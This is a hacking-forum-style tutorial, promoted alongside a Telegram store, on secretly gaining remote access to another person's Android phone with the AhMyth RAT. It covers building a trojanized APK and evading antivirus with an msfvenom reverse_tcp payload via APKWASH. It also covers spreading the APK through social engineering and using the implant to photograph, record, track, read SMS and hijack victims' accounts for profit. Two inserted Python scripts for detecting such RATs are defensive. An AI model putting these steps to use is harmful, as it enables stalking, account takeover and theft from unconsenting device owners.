We get access to someone else's Android smartphone

Tomcat

A complete guide from A to Z, including the crypts of our malware.
More useful information in our store: @DBmarketbot
Sit back, we're getting started!

Why bother accessing someone else's smartphone?

From banal surveillance of the right person to theft of personal data and funds from banking applications and wallets.

How to create a RAT for Android

The term RAT (Remote Access Tool) refers to remote administration utilities. They can be used legitimately for their intended purpose, as with the popular TeamViewer, or they can be installed by hackers secretly, without the user's knowledge.
In such cases RAT is usually expanded as Remote Access Trojan, and the literal meaning of the English word "rat" comes in handy here.
Today's guide covers the free AhMyth RAT, which any of you can use.
AhMyth RAT (Remote Access Trojan) is an open-source application currently in beta. The tool is aimed at Windows users, but the AhMyth sources can also be downloaded from GitHub for Unix-like platforms.

The AhMyth program for building an Android RAT consists of two components.
  1. A server application used to control an infected device and to build APK files with the malicious code. It is written on Electron, a framework developed by GitHub for creating simple graphical desktop applications.
  2. A client APK containing the malicious code that allows remote access to the infected Android device. In other words, the generated APK file acts as a backdoor.

Installing AhMyth RAT

The server part is very easy to install, especially since the author of the RAT builder has published prebuilt binaries. If you wish, you can also compile it from source. In my case, the tests were run on a Windows 10 virtual machine.
The utility requires a Java virtual machine installed on the computer; you can download it from the official Java website. After that, download the AhMyth binaries themselves: you can find them in the official project repository on GitHub, under Assets. During the download I recommend turning off the antivirus so that it does not have a fit over what is happening.

Creating an infected APK


To create an Android APK file, open the APK Builder tab. The appearance of the constructor for creating a RAT for Android is shown below:
[screenshot: the APK Builder tab]


The AhMyth RAT builder is very easy to use. In the Source IP field, enter the IP address of the attacking machine (this address is easily recovered later during forensic analysis of the malware, so I advise you not to forget about anonymity).
In the Source Port field, you can specify the port the machine will reserve for listening for connections. The default port is 42474.
There is also a Bind With Another Apk option that lets you bind the APK file to another application.
To do this, check the Bind With Another Apk checkbox, select the required APK and specify the method for launching the malware on the phone. There are two methods: on launch of the infected APK, or on reboot of the phone after the RAT has been installed. The authors of the program recommend the second option.
All that remains is to click the Build button. By default, the infected file is saved to the folder:
C:\Users\<Your_Username>\AhMyth\Output

How not to get caught by mobile antiviruses

Bypassing antivirus on Android is one of the most difficult tasks. Well, at least that's how it used to be. There is now a tool called APKWASH that can hide malicious applications from detection by most antiviruses.
Clone the APKWASH tool on Kali Linux with the following command:
git clone https://github.com/jbreed/apkwash.git


Give the tool execute permissions with the following command:
chmod +x apkwash



The options apkwash accepts are listed below:
-p | --payload <payload>      Sets the payload to be generated by msfvenom.
-o | --output <outfile.apk>   Sets the name of the generated APK as well as the output apk file.
-x | --original <infile.apk>  The APK into which the payload will be embedded.
-g | --generate               Generate a payload using the default values.
-n | --newkey                 Generate a new debug key before signing.
-v | --verbose                Do not mask command output.
-d | --debug                  Leaves /tmp/payload files in place for viewing.
-h | --help                   Reference information.
We can now use the following command to create a malicious file:
apkwash -p android/meterpreter/reverse_tcp LHOST=192.168.0.12 LPORT=1337 -o update.apk



Now you have a malicious apk file that cannot be detected by your antivirus.



Detections: 0 out of 35. Perfect!
With the right skills, the script can be adapted further to your own needs.

RAT distribution for Android

How the malware built this way is distributed is a separate topic. I will only note that RAT-infected programs are regularly found on Google Play and just as regularly removed from it, which does not stop malware from appearing in that catalogue again. Social engineering methods have not gone anywhere either. But keep in mind that to activate the RAT after installing the application, the infected application must be launched or the device rebooted (depending on the builder settings).
Success also requires that installation of apps from unknown sources be permitted in the target device's settings, that is, the "Install from trusted sources only" restriction must be turned off. And it is turned off for almost everyone.

Connecting to an infected device

Now go to the Victims tab and enter the same port in the field that we specified earlier, so that the server waits for connections from infected devices. Again, if you didn't change anything when building the APK, you don't need to specify anything here either.
Click Listen, and if our APK has successfully infected a mobile device, we will see a new connection.
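From the defender's side, the connection described above is what shows up in the network logs: the builder fixes the attacker's Source IP and Source Port in the APK, and every infected device connects back to that same pair. The following Python is an added detection example, not part of the post or of AhMyth. It parses constructed firewall log lines (a simplified, made-up format), counts connections per (source, destination, destination port), and flags the default port 42474 named in the guide as well as repeated connections to the same host on a port outside an assumed ORDINARY_PORTS set. The sample addresses, the log format and the port list are assumptions of this example.

```python
import re
from collections import defaultdict

# AhMyth's default listener port, as stated in the guide (Source Port field).
AHMYTH_DEFAULT_PORT = 42474

# Ports treated as ordinary outbound traffic; anything else counts as
# "non-standard" for the repeat-connection heuristic (assumption for this example).
ORDINARY_PORTS = {80, 443, 53, 853, 5228}

# Constructed sample of simplified firewall log lines (not real traffic).
SAMPLE_LOG = """\
2024-05-01T08:00:01 ACCEPT src=10.20.0.15 dst=203.0.113.9 proto=tcp sport=51212 dport=443
2024-05-01T08:00:05 ACCEPT src=10.20.0.31 dst=198.51.100.77 proto=tcp sport=40211 dport=42474
2024-05-01T08:05:05 ACCEPT src=10.20.0.31 dst=198.51.100.77 proto=tcp sport=40330 dport=42474
2024-05-01T08:10:06 ACCEPT src=10.20.0.31 dst=198.51.100.77 proto=tcp sport=40512 dport=42474
2024-05-01T08:11:00 ACCEPT src=10.20.0.15 dst=203.0.113.9 proto=tcp sport=51290 dport=443
2024-05-01T08:11:30 ACCEPT src=10.20.0.15 dst=203.0.113.9 proto=tcp sport=51291 dport=443
2024-05-01T08:12:00 ACCEPT src=10.20.0.42 dst=192.0.2.200 proto=tcp sport=39000 dport=5555
2024-05-01T08:17:00 ACCEPT src=10.20.0.42 dst=192.0.2.200 proto=tcp sport=39001 dport=5555
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<action>\w+) src=(?P<src>[\d.]+) dst=(?P<dst>[\d.]+) "
    r"proto=(?P<proto>\w+) sport=(?P<sport>\d+) dport=(?P<dport>\d+)$"
)


def parse_log(text):
    """Turn log lines into dicts; lines that do not match the format are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            e = m.groupdict()
            e["dport"] = int(e["dport"])
            events.append(e)
    return events


def find_rat_indicators(events, min_repeats=3):
    """Group outbound connections by (src, dst, dport) and flag RAT-like patterns."""
    counts = defaultdict(int)
    for e in events:
        counts[(e["src"], e["dst"], e["dport"])] += 1
    findings = []
    for (src, dst, dport), n in sorted(counts.items()):
        reasons = []
        if dport == AHMYTH_DEFAULT_PORT:
            reasons.append("default AhMyth listener port")
        if n >= min_repeats and dport not in ORDINARY_PORTS:
            reasons.append(f"{n} repeated connections to the same host on a non-standard port")
        if reasons:
            findings.append({"src": src, "dst": dst, "dport": dport,
                             "count": n, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_rat_indicators(parse_log(SAMPLE_LOG)):
        print(f"{f['src']} -> {f['dst']}:{f['dport']} ({f['count']}x): "
              + "; ".join(f["reasons"]))
```

Because Source Port is a free field in the builder, matching the default port alone is a weak signal; the repeated same-destination pattern is the durable one, and it is what to look for when the port has been changed. On the constructed sample only 10.20.0.31 is flagged, for both reasons.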

[screenshot: the Victims tab showing a new connection]


The program also logs all actions in the console at the bottom of the window. The meaning of the columns in the log is mostly self-evident.
  • Country - the country in which the infected device is operating.
  • Manuf - the device manufacturer.
  • Model - the code or model name of the device.
  • Release - the operating system version of the infected device (in my case, Android 10).
  • IP - the device's IP address; Port - the port through which the infected device connected to the attacking machine.
Now it's time to move on to active operations: click the Open The Lab button.

Using RAT AhMyth

We are offered a menu of seven items, giving access to the program's various functions.

Camera

First, let's take a look at the Camera section. Select a camera: front (Front) or main (Back) - and you can take a picture by pressing the Snap button.



File manager

The file manager here is not as advanced as in other RATs for Android and Windows, but it is still a very useful thing. With its help you can at least download the files we need from an infected device. As you can see, the home directory is the root directory, and it can only be accessed with superuser (root) rights.



Microphone

This function lets you use the device's microphone in the background and record everything the phone "hears" for a specified time (enter the recording duration in seconds in the Seconds field). Then press Record and wait. The resulting file can be listened to directly in the program window or saved to your machine.



Geo position

In my opinion, this is the most interesting feature of AhMyth. If geodata transmission is enabled on the infected device, you will be able to find out a person's geolocation with an accuracy of ten meters. Inexperienced users very rarely remember this option and leave it enabled. Plus, some applications (maps, for example) that use geodata will sooner or later force a person to turn this function on.



Contacts

With this function you can pull the entire list of contacts stored in the phone. The entire contact list can be downloaded to your machine.


SMS

Another very interesting section. With it you can send an SMS to someone, or view and download all messages received on this device.
To send an SMS, go to the Send SMS tab, specify the recipient's phone number (the TO:// field), and enter the message text in the Message field. After that, all that remains is to press the SEND button.
This function can be used to reset the passwords of the accounts of the owner of the infected device, for example, to hack Vkontakte or Instagram.


You can send a message to any recipient


Viewing a list of messages

Call log

This section lets you view the list of phone calls. There are four pieces of information about each call: the number the infected device communicated with; the name of the contact associated with that number on the infected device; the call duration (in seconds); and the type of call (incoming or outgoing).
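Each section above (camera, microphone, geo position, contacts, SMS, call log, file manager) corresponds to an Android permission the client APK has to declare in its manifest, and the "restart the phone" activation method depends on a receiver for the BOOT_COMPLETED broadcast; binding with another APK does not remove that requirement, because the merged app still has to declare them. The following Python is an added example of how a reviewer would rate an APK from the defender's side; it is not part of the post or of AhMyth. It scores a decoded AndroidManifest.xml by how many surveillance capabilities its permissions cover. The two manifests are constructed samples (a real APK's manifest is binary-encoded and must first be decoded with a tool such as apktool), and the capability mapping, the threshold of four and the verdict labels are assumptions of this example.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"

# Dangerous permissions behind each capability the guide walks through
# (camera, microphone, geo position, contacts, SMS, call log, file manager)
# and the boot-completed start used by the "restart the phone" activation method.
CAPABILITY_PERMISSIONS = {
    "camera": {"android.permission.CAMERA"},
    "microphone": {"android.permission.RECORD_AUDIO"},
    "location": {"android.permission.ACCESS_FINE_LOCATION",
                 "android.permission.ACCESS_COARSE_LOCATION"},
    "contacts": {"android.permission.READ_CONTACTS"},
    "sms": {"android.permission.READ_SMS", "android.permission.SEND_SMS",
            "android.permission.RECEIVE_SMS"},
    "call_log": {"android.permission.READ_CALL_LOG"},
    "file_access": {"android.permission.READ_EXTERNAL_STORAGE",
                    "android.permission.WRITE_EXTERNAL_STORAGE"},
    "start_at_boot": {"android.permission.RECEIVE_BOOT_COMPLETED"},
}
# Capabilities that together form the surveillance profile of a RAT.
SURVEILLANCE = {"camera", "microphone", "location", "contacts", "sms", "call_log"}

# Constructed decoded manifests (assumed sample apps, not real packages).
BENIGN_MANIFEST = """\
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.calculator">
    <uses-permission android:name="android.permission.INTERNET"/>
    <application android:label="Calculator"/>
</manifest>"""

SUSPICIOUS_MANIFEST = """\
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.update">
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.CAMERA"/>
    <uses-permission android:name="android.permission.RECORD_AUDIO"/>
    <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
    <uses-permission android:name="android.permission.READ_CONTACTS"/>
    <uses-permission android:name="android.permission.READ_SMS"/>
    <uses-permission android:name="android.permission.SEND_SMS"/>
    <uses-permission android:name="android.permission.READ_CALL_LOG"/>
    <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
    <application android:label="Update">
        <receiver android:name=".BootReceiver">
            <intent-filter>
                <action android:name="android.intent.action.BOOT_COMPLETED"/>
            </intent-filter>
        </receiver>
    </application>
</manifest>"""


def profile_manifest(manifest_xml, threshold=4):
    """Map declared permissions to capabilities and rate the surveillance profile.

    threshold: how many surveillance capabilities make the app "rat-like"
    (an assumption for this example; tune it for your environment).
    """
    root = ET.fromstring(manifest_xml)
    perms = {el.get(ANDROID_NS + "name") for el in root.iter("uses-permission")}
    perms.discard(None)
    caps = {cap for cap, needed in CAPABILITY_PERMISSIONS.items() if perms & needed}
    # A receiver for BOOT_COMPLETED is what lets the implant start after a reboot.
    boot_receiver = any(
        a.get(ANDROID_NS + "name") == "android.intent.action.BOOT_COMPLETED"
        for a in root.iter("action")
    )
    if boot_receiver:
        caps.add("start_at_boot")
    spy_count = len(caps & SURVEILLANCE)
    if spy_count >= threshold:
        verdict = "rat-like"
    elif spy_count >= 2:
        verdict = "review"
    else:
        verdict = "benign"
    return {
        "package": root.get("package"),
        "permissions": sorted(perms),
        "capabilities": sorted(caps),
        "surveillance_count": spy_count,
        "boot_receiver": boot_receiver,
        "verdict": verdict,
    }


if __name__ == "__main__":
    for m in (BENIGN_MANIFEST, SUSPICIOUS_MANIFEST):
        r = profile_manifest(m)
        print(f"{r['package']}: {r['verdict']} ({r['surveillance_count']} surveillance "
              f"capabilities, boot receiver: {r['boot_receiver']})")
```

A permission profile is a triage signal, not proof: a legitimate messaging app can hold several of these permissions. The point of the check is the mismatch between what an app claims to be (a calculator, an "update") and the breadth of data it asks to reach, which is exactly the combination the sections above describe.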



Conclusions

As you can see, the tool is extremely useful and can help in a wide variety of situations. With the right skills, its use can be monetized very well.
 